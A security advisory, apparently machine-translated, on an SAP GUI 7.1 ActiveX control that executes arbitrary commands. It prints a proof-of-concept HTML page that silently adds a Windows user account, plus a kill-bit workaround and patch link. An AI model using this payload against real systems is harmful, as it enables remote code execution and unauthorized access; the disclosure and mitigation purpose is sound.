Response version:
SAP Sapgui 7.1 vulnerability description:
SAPgui is the graphical user interface client of SAP software.
The SAPBExCommonResources activeX Control installed in the sap gui does not properly filter parameters transmitted to the Execute call method, A user is cheated to access a malicious webpage and transmits malicious parameters to this method, causing arbitrary code execution. <* Reference
Alexey Sintsov (don_huan@xakep.ru)
Http://dsecrg.com/pages/vul/show.php? Id = 164
*>
Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! <Html>
<Title> * DSecRG * Add user * DSecRG * </title>
<Object classid = "clsid: A009C90D-814B-11D3-BA3E-080009D22344" id = DH> </object>
<Script language = Javascript>
Function init ()
{
DH. Execute ("net.exe", "user don_huan p4ssW0rd/add", "d: \ windows \", 1, "", 1 );
}
Init ();
</Script>
DSecRG
</Html> SEBUG Security suggestions:
Temporary solution:
* Set kill bit for clsid: A009C90D-814B-11D3-BA3E-080009D22344.
Vendor patch:
SAP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Https://service.sap.com/sap/support/notes/1407285 //